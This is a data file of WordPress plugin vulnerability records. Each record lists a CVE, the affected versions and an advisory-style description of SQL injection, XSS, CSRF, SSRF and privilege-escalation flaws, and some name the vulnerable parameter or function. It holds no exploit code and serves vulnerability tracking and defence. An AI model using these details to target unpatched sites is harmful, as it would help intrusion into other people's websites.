{"CVE_ID":"CVE-2025-23912","slug":"wordpress-custom-sidebar","versionImpact":"2.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Typomedia Foundation WordPress Custom Sidebar allows Blind SQL Injection.This issue affects WordPress Custom Sidebar: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-custom-sidebar\\\/vulnerability\\\/wordpress-wordpress-custom-sidebar-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-custom-sidebar\\\/vulnerability\\\/wordpress-wordpress-custom-sidebar-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13157","slug":"mp3-music-player-by-sonaar","versionImpact":"5.9.3","description":"The MP3 Audio Player \u2013 Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Podcast RSS Feed in all versions up to, and including, 5.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music-widget.php#L1733\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music-widget.php#L1733\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231414\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231414\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/547325ad-0b01-42d5-b47c-362044587395?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/547325ad-0b01-42d5-b47c-362044587395?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6437","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the \u2018oid\u2019 parameter in all versions up to, and including, 4.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d74e494-b5a0-4e44-8efe-9f904de6b878?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d74e494-b5a0-4e44-8efe-9f904de6b878?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6692","slug":"youram-youtube-embed","versionImpact":"10.3","description":"The YouTube Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018instance\u2019 parameter in all versions up to, and including, 10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youram-youtube-embed\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youram-youtube-embed\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf558c77-fc78-4149-bc7f-2b5353144daf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf558c77-fc78-4149-bc7f-2b5353144daf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0684","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_unassign_folders function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29358ea9-21b7-4294-8fc9-0d38e689cf53\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29358ea9-21b7-4294-8fc9-0d38e689cf53\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0491","slug":"schedulicity-online-appointment-booking","versionImpact":"2.21","description":"The Schedulicity WordPress plugin through 2.21 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1a7e8fc-ffcf-493b-9f2d-ffa5d2348b60\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1a7e8fc-ffcf-493b-9f2d-ffa5d2348b60\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0766","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks as the wp_newsletter_show_localrecord page is not protected with a nonce.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90a1976c-0348-41ea-90b4-f7a5d9306c88\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90a1976c-0348-41ea-90b4-f7a5d9306c88\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2563","slug":"contact-forms","versionImpact":"1.5.7","description":"The WordPress Contact Forms by Cimatti plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.7. This is due to missing or incorrect nonce validation on the function _accua_forms_form_edit_action. This makes it possible for unauthenticated attackers to delete forms created with this plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f80a1f13-c1b9-4259-8d96-71a3cbcaf4ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f80a1f13-c1b9-4259-8d96-71a3cbcaf4ca?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms.php#L738\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms.php#L738\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2924628%40contact-forms&new=2924628%40contact-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2924628%40contact-forms&new=2924628%40contact-forms&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3779","slug":"essential-addons-for-elementor-lite","versionImpact":"5.8.1","description":"The Essential Addons For Elementor plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 5.8.1 due to the plugin adding the API key to the source code of any page running the MailChimp block. This makes it possible for unauthenticated attackers to obtain a site's MailChimp API key. We recommend resetting any MailChimp API keys if running a vulnerable version of this plugin with the MailChimp block enabled as the API key may have been compromised. This only affects sites running the premium version of the plugin and that have the Mailchimp block enabled on a page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2938177%40essential-addons-for-elementor-lite&new=2938177%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2938177%40essential-addons-for-elementor-lite&new=2938177%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e007c713-74bc-4ff5-a198-70dcc8a8ee68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e007c713-74bc-4ff5-a198-70dcc8a8ee68?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6880","slug":"visualcomposer","versionImpact":"45.6.0","description":"The Visual Composer Website Builder, Landing Page Builder, Custom Theme Builder, Maintenance Mode & Coming Soon Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom fields in all versions up to, and including, 45.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/622b9b46-774d-4251-9a79-73e5b398de57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/622b9b46-774d-4251-9a79-73e5b398de57?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/help.visualcomposer.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/help.visualcomposer.com\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1688","slug":"woo-total-sales","versionImpact":"3.1.4","description":"The Woo Total Sales plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_orders_archive() function in all versions up to, and including, 3.1.4. This makes it possible for unauthenticated attackers to retrieve sales reports for the store.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/630d5dcc-ee51-4c2d-b4fb-191637311d6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/630d5dcc-ee51-4c2d-b4fb-191637311d6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-total-sales\\\/trunk\\\/includes\\\/awts-backend-general-overview.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-total-sales\\\/trunk\\\/includes\\\/awts-backend-general-overview.php#L256\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7247","slug":"bdthemes-element-pack-lite","versionImpact":"5.7.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Custom Gallery and Countdown widgets in all versions up to, and including, 5.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86068c50-2f24-4af9-a20f-704d52e98ce2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86068c50-2f24-4af9-a20f-704d52e98ce2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/bdt-uikit.js#L4223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/bdt-uikit.js#L4223\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/ep-scripts.js#L514\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/ep-scripts.js#L514\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/ep-scripts.js#L576\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/ep-scripts.js#L576\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3130355%40bdthemes-element-pack-lite&new=3130355%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3130355%40bdthemes-element-pack-lite&new=3130355%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133714\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133714\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133714\\\/#file1110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133714\\\/#file1110\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9368","slug":"aggregator-advanced-settings","versionImpact":"1.2.1","description":"The Aggregator Advanced Settings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/838bfa4c-2eb7-4f76-a6c3-ab4684f3913c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/838bfa4c-2eb7-4f76-a6c3-ab4684f3913c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aggregator-advanced-settings\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aggregator-advanced-settings\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10180","slug":"cf7-repeatable-fields","versionImpact":"2.0.1","description":"The Contact Form 7 \u2013 Repeatable Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's field_group shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0782bc16-7d21-4205-af01-97e3ad3db40b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0782bc16-7d21-4205-af01-97e3ad3db40b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-repeatable-fields\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-repeatable-fields\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173935\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173935\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10323","slug":"jetwidgets-for-elementor","versionImpact":"1.0.18","description":"The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b4e4ba-ab66-496a-b77f-8dd77cd16ea8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b4e4ba-ab66-496a-b77f-8dd77cd16ea8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jetwidgets-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jetwidgets-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184475\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184475\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12470","slug":"sakolawp-lite","versionImpact":"1.0.8","description":"The School Management System \u2013 SakolaWP plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.8. This is due to the registration function not properly limiting what roles a user can register as. This makes it possible for unauthenticated attackers to register as an administrative user.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sakolawp-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sakolawp-lite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db1c581b-5cc9-46c0-ba5d-605642697729?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db1c581b-5cc9-46c0-ba5d-605642697729?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23842","slug":"wordpress-gallery-plugin","versionImpact":"1.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Nilesh Shiragave WordPress Gallery Plugin allows Cross Site Request Forgery.This issue affects WordPress Gallery Plugin: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-gallery-plugin\\\/vulnerability\\\/wordpress-wordpress-gallery-plugin-plugin-1-4-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-gallery-plugin\\\/vulnerability\\\/wordpress-wordpress-gallery-plugin-plugin-1-4-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5817","slug":"import-products-to-wc","versionImpact":"1.2.7","description":"The Amazon Products to WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.7 via the wcta2w_get_urls(). This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-products-to-wc\\\/trunk\\\/inc\\\/urls-ajax.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-products-to-wc\\\/trunk\\\/inc\\\/urls-ajax.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5055cf24-14c7-4533-8900-a5f4c1435201?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5055cf24-14c7-4533-8900-a5f4c1435201?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6681","slug":"fan-page","versionImpact":"1.0.1","description":"The Fan Page plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fan-page\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fan-page\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f86a85c-fe40-4020-b4d2-623dabac98a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f86a85c-fe40-4020-b4d2-623dabac98a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0733","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fed1e184-ff56-44fe-9876-d17c0156447a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fed1e184-ff56-44fe-9876-d17c0156447a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3813","slug":"jupiterx-core","versionImpact":"2.5.0","description":"The Jupiter X Core plugin for WordPress is vulnerable to arbitrary file downloads in versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to download the contents of arbitrary files on the server, which can contain sensitive information. The requires the premium version of the plugin to be activated.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/utils.php?rev=2777235#L425\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/utils.php?rev=2777235#L425\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f767d94b-fe92-4b69-9d81-96de51e12983?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f767d94b-fe92-4b69-9d81-96de51e12983?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6825","slug":"wp-file-manager","versionImpact":"7.2.1","description":"The File Manager and File Manager Pro plugins for WordPress are vulnerable to Directory Traversal in versions up to, and including version 7.2.1 (free version) and 8.3.4 (Pro version) via the target parameter in the  mk_file_folder_manager_action_callback_shortcode function. This makes it possible for attackers to read the contents of arbitrary files on the server, which can contain sensitive information and to upload files into directories other than the intended directory for file uploads. The free version requires Administrator access for this vulnerability to be exploitable. The Pro version allows a file manager to be embedded via a shortcode and also allows admins to grant file handling privileges to other user levels, which could lead to this vulnerability being exploited by lower-level users.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93f377a1-2c33-4dd7-8fd6-190d9148e804?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93f377a1-2c33-4dd7-8fd6-190d9148e804?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Studio-42\\\/elFinder\\\/blob\\\/master\\\/php\\\/elFinderVolumeDriver.class.php#L6784\",\"name\":\"https:\\\/\\\/github.com\\\/Studio-42\\\/elFinder\\\/blob\\\/master\\\/php\\\/elFinderVolumeDriver.class.php#L6784\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023403%40wp-file-manager%2Ftrunk&old=2984933%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023403%40wp-file-manager%2Ftrunk&old=2984933%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1679","slug":"a4-barcode-generator","versionImpact":"3.4.6","description":"The Print Labels with Barcodes. Create price tags, product labels, order labels for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the template and javascript label fields in all versions up to, and including, 3.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2d03b83-c406-4d3f-b6be-015edcc15515?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2d03b83-c406-4d3f-b6be-015edcc15515?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/a4-barcode-generator\\\/trunk\\\/class\\\/BarcodeTemplates\\\/BarcodeTemplatesController.php?rev=2870656\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/a4-barcode-generator\\\/trunk\\\/class\\\/BarcodeTemplates\\\/BarcodeTemplatesController.php?rev=2870656\",\"refsource\":\"\",\"tags\":[]}]"}
